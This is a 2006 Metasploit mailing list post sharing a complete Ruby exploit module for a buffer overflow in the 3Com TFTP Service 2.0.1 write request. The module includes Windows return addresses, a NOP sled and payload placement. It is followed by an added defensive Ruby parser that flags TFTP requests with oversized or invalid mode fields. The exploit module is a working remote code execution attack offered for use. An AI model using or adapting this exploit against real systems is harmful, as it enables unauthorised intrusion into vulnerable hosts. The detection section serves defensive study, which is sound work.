Metasploit mailing list archives

msf3 3Com TFTP exploit


From: grutz at jingojango.net (Kurt Grutzmacher)
Date: Thu, 30 Nov 2006 10:03:22 -0600

Doesn't look like SEH is being overwritten so I'm having trouble getting
this to work with DEP-enabled XPSP2 and 2K3. Tested on XPSP2 and Win2K. 
Includes offsets for NT, 2K and XP (call esi).

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

require 'msf/core'

module Msf

class Exploits::Windows::Tftp::ThreeCeeTftpSvc_Overflow < Msf::Exploit::Remote

        include Exploit::Remote::Udp

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => '3CTftpSvc Server 2.0.1 Long Request Buffer Overflow',
                        'Description'    => %q{
                                3Com TFTP Service version 2.0.1 suffers from a long type buffer
                                overflow during a write TFTP request. Does not require write access
                                to be enabled on the server.

                                Attacker controls ESI.

                                Liu Qixu of NCNIPC published this vulnerability.
                        },
                        'Author'         => 'grutz [at] jingojango.net',
                        'Version'        => '$$',
                        'References'     => 
                                [ 
                                        ['URL', 'http://support.3com.com/software/utilities_for_windows_32_bit.htm'],
                                        ['BID', '21301'],
                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'thread',
                                },
                        'Payload'        =>
                                {
                                        'Space'    => 440,
                                        'BadChars' => "\x00",
                                        'StackAdjustment' => -3500,
                                },
                        'Platform'       => 'win',
                        
                        'Targets'        =>
                                [
                                        ['Windows 2000 All SP English',   { 'Ret' => 0x750217ae } ], # call esi ws2help
                                        ['Windows XP SP2 English',        { 'Ret' => 0x71aa1b22 } ], # call esi ws2help
                                        ['Windows NT SP5/6 English',      { 'Ret' => 0x776a117e } ], # call esi ws2help
                                ],

                        'DefaultTarget'  => 0,
                        'Privileged'     => false,
                        'DisclosureDate' => 'Nov 27 2006'

                        ))

                        register_options(
                                [
                                        Opt::RPORT(69)
                                ], self)

        end

        def exploit
                connect_udp

                print_status("Trying target #{target.name}...")

                sploit = 
                        "\x00\x02" + 
                        Rex::Text.rand_text_english(1, payload_badchars) + 
                        "\x00" +
                        make_nops(473) +
                        [target.ret].pack('V') +
                        "\x00"
                        
        sploit[9, payload.encoded.length] = payload.encoded

                udp_sock.put(sploit)
                
                disconnect_udp          
        end

end
end


-- 
                 ..:[ grutz at jingojango dot net ]:..
     GPG fingerprint: 5FD6 A27D 63DB 3319 140F  B3FB EC95 2A03 8CB3 ECB4
        "There's just no amusing way to say, 'I have a CISSP'."
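From the defender's side, the request the module above builds is easy to recognise on the wire: a TFTP write request (opcode 2) whose mode ("type") field, which RFC 1350 restricts to `netascii`, `octet` or `mail`, is instead hundreds of bytes long. The following is an added example, not code from the post or from Metasploit: a minimal TFTP request parser with a check that flags requests whose filename or mode field is oversized or not a legitimate mode. The length threshold, function names and sample datagrams are constructed for the example.

```ruby
# Added example (not part of the original post): parse TFTP RRQ/WRQ datagrams
# and flag requests whose filename or mode field is oversized or not one of the
# RFC 1350 modes. Threshold and sample packets below are constructed.

TFTP_OPCODES  = { 1 => 'RRQ', 2 => 'WRQ' }.freeze
VALID_MODES   = %w[netascii octet mail].freeze # RFC 1350, case-insensitive
MAX_FIELD_LEN = 128 # constructed limit; real filenames and modes are far shorter

# Parse a TFTP request datagram into opcode, filename and mode.
# Returns nil for non-request opcodes (DATA, ACK, ERROR) and malformed requests.
def parse_tftp_request(pkt)
  pkt = pkt.b # treat as raw bytes so split does not choke on non-UTF-8 filler
  return nil if pkt.bytesize < 4
  opcode = pkt.byteslice(0, 2).unpack1('n')
  return nil unless TFTP_OPCODES.key?(opcode)
  # After the opcode come two NUL-terminated strings: filename, then mode.
  # A well-formed request ends in NUL, so split(-1) yields a trailing "".
  fields = pkt.byteslice(2..-1).split("\x00", -1)
  return nil if fields.length < 3
  { opcode: TFTP_OPCODES[opcode], filename: fields[0], mode: fields[1] }
end

# Return a list of findings for one datagram; empty means nothing suspicious.
def inspect_tftp_request(pkt)
  req = parse_tftp_request(pkt)
  return [] if req.nil?
  findings = []
  if req[:filename].bytesize > MAX_FIELD_LEN
    findings << "#{req[:opcode]} filename is #{req[:filename].bytesize} bytes (limit #{MAX_FIELD_LEN})"
  end
  if req[:mode].bytesize > MAX_FIELD_LEN
    findings << "#{req[:opcode]} mode field is #{req[:mode].bytesize} bytes (limit #{MAX_FIELD_LEN})"
  end
  unless VALID_MODES.include?(req[:mode].downcase)
    findings << "#{req[:opcode]} mode #{req[:mode].byteslice(0, 16).inspect}... is not an RFC 1350 mode"
  end
  findings
end

# Constructed sample datagrams.
BENIGN_WRQ    = "\x00\x02config.bin\x00octet\x00".b
# A write request with a one-byte filename and a 477-byte filler mode field,
# the shape of the request described in the post (filler only, no payload).
LONG_MODE_WRQ = ("\x00\x02" + "A" + "\x00" + ("A" * 477) + "\x00").b
DATA_PKT      = "\x00\x03\x00\x01hello".b # DATA block 1, not a request

if __FILE__ == $PROGRAM_NAME
  [BENIGN_WRQ, LONG_MODE_WRQ, DATA_PKT].each_with_index do |pkt, i|
    findings = inspect_tftp_request(pkt)
    puts "packet #{i}: #{findings.empty? ? 'ok' : findings.join('; ')}"
  end
end
```

The length check alone would have caught this request; the mode whitelist is the more durable rule, since a legitimate client has no reason to send anything other than the three RFC 1350 modes, regardless of how long the overflow string happens to be.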


